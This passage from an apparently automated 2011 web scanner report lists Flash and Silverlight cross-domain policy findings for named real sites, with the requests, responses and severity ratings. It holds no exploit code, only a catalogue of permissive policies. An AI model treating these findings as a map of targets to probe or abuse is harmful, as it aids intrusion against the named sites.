Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/xml
Content-Length: 246

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.39. http://rs.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rs.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.40. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 21:09:16 GMT
Expires: Thu, 21 Apr 2011 21:08:25 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 63651
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.41. http://search.twitter.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Cache-Control: max-age=1800
Expires: Mon, 25 Apr 2011 15:01:27 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 124651946 124570955
Age: 521
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-31-sr2.prod.twitter.com
X-Cache: HIT
X-Cache-Hits: 4
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.42. http://widgets.fotocash.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.fotocash.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.fotocash.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:29:10 GMT
Content-Type: text/xml
Content-Length: 138
Last-Modified: Thu, 21 Oct 2010 13:56:12 GMT
Connection: close
Expires: Wed, 25 May 2011 14:29:10 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

7.43. http://www.instantengage.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.instantengage.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instantengage.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:00 GMT
Server: Apache/2.0.50 (Fedora)
Last-Modified: Wed, 04 Apr 2007 15:17:04 GMT
ETag: "55c03c-ca-f25f3c00"
Accept-Ranges: bytes
Content-Length: 202
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.44. http://cache.fimservecdn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cache.fimservecdn.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.fimservecdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.67
Content-Type: application/xml
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Length: 695
Cache-Control: max-age=2592000
Date: Mon, 25 Apr 2011 16:07:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...

7.45. http://demr.opt.fimserve.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://demr.opt.fimserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: demr.opt.fimserve.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:45 GMT
Content-Type: application/xml
Connection: keep-alive
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Length: 695
Server: ASP/0.0.0.0/0.7.61

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...

7.46. http://desk.opt.fimserve.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://desk.opt.fimserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: desk.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 16:12:56 GMT
Content-Type: application/xml
Connection: keep-alive
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Length: 695

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...

7.47. http://gomail.radar.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gomail.radar.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gomail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:51:42 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

7.48. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 24 Apr 2011 21:14:04 GMT
Expires: Mon, 25 Apr 2011 21:14:04 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53567
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.49. http://imagesrv.gartner.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imagesrv.gartner.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 11 Jan 2010 19:57:11 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 250
ETag: "pv3dca051be9ba6a415f8df8e0b0d315af"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.U50F79C0A].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3bc17e06277dbf6b1363ce7f36ea10b3bb7b54d78751fcaa4db564e4; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
<allow-access-from domain="imagesrv" />
...[SNIP]...

7.50. http://img.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:50:50 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:50:50 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

7.51. http://img.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.imgsmail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:54:43 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:54:43 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

7.52. http://img.mail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:34:11 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:34:11 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

7.53. http://js.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://js.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:24 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:40:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

7.54. http://mail.radar.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.radar.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:25:12 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

7.55. http://mail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:24:41 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: mrcu=1AB44DB58429635EFBCAF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:41 GMT; path=/; domain=.mail.ru
Content-Length: 343
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.files.mail.ru" to-ports="80"/><allow-access-from domain="img.imgsmail.ru" to-ports="80"/><allow-access-from domain="win.mail.ru" to-ports="80"/><allow-access-from domain="e.mail.ru" to-ports="80"/>
...[SNIP]...

7.56. http://odnoklassniki.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1148-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 1148
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-http-request-headers-from domain="odnoklassniki.ru" headers="*"/>
<allow-http-
...[SNIP]...
<allow-access-from domain="*.odnoklassniki.ru"/>
<allow-access-from domain="odnoklassniki.ua"/>
<allow-access-from domain="*.odnoklassniki.ua"/>
<allow-access-from domain="odnoklasniki.ru"/>
<allow-access-from domain="*.odnoklasniki.ru"/>
<allow-access-from domain="odnoklasniki.ua"/>
<allow-access-from domain="*.odnoklasniki.ua"/>
...[SNIP]...

7.57. http://oth.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://oth.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oth.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

7.58. http://server.iad.liveperson.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:c30"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 15:53:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

7.59. http://www.gartner.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 28 Jan 2008 18:59:12 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 214
ETag: "pve91a8585e0a42393cfbb818f11d57002"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.UDDE6142E].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=1da366c651cf93bce481d43030625b76ac71a41bc37e25a84db564c8; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross-
...[SNIP]...

7.60. https://www.salesforce.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.salesforce.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.salesforce.com

Response

HTTP/1.0 200 OK
Server: SFDC
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Date: Mon, 25 Apr 2011 16:06:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.salesforce.com" />
<allow-access-from domain="www.force.com" />
<allow-access-from domain="developer.force.com" />
<allow-access-from domain="salesforce.vo.llnwd.net" />
<allow-access-from domain="www3.stream.co.jp" />
<allow-access-from domain="salesforce.sitestream.com" />
<allow-access-from domain="*.jellyvision-conversation.com" />
...[SNIP]...

7.61. http://www.livejournal.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:55 GMT
Content-Type: text/xml
Connection: close
X-AWS-Id: ws07
Set-Cookie: ljuniq=BlrhjlxYzDyERwT:1303741675:pgstats0:m0; expires=Friday, 24-Jun-2011 14:27:55 GMT; domain=.livejournal.com; path=/
Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT
ETag: "bb0fbb-26b-49eb04f04f400"
Accept-Ranges: bytes
Content-Length: 619
X-Varnish: 1789549813
Age: 0
Via: 1.1 varnish

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-coss-domain-polic
...[SNIP]...
<allow-access-from domain="wh.lj.ru"/>
<allow-access-from domain="ljaqua.wh.lj.ru"/>
<allow-access-from domain="swfplayer.services.livejournal.com"/>
<allow-access-from domain="player.livejournal.ru"/>
<allow-access-from domain="player.championat.net"/>
<allow-access-from domain="player.gazeta.ru"/>
<allow-access-from domain="player.quto.ru"/>
...[SNIP]...

8. Silverlight cross-domain policy previous next
There are 5 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://beacon.securestudies.com/clientaccesspolicy.xml
http://pl.yumenetworks.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.2. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.3. http://beacon.securestudies.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beacon.securestudies.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.4. http://pl.yumenetworks.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pl.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:49 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Fri, 18 Mar 2011 06:46:34 GMT
ETag: "21a082c-135-49ebc23880680"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
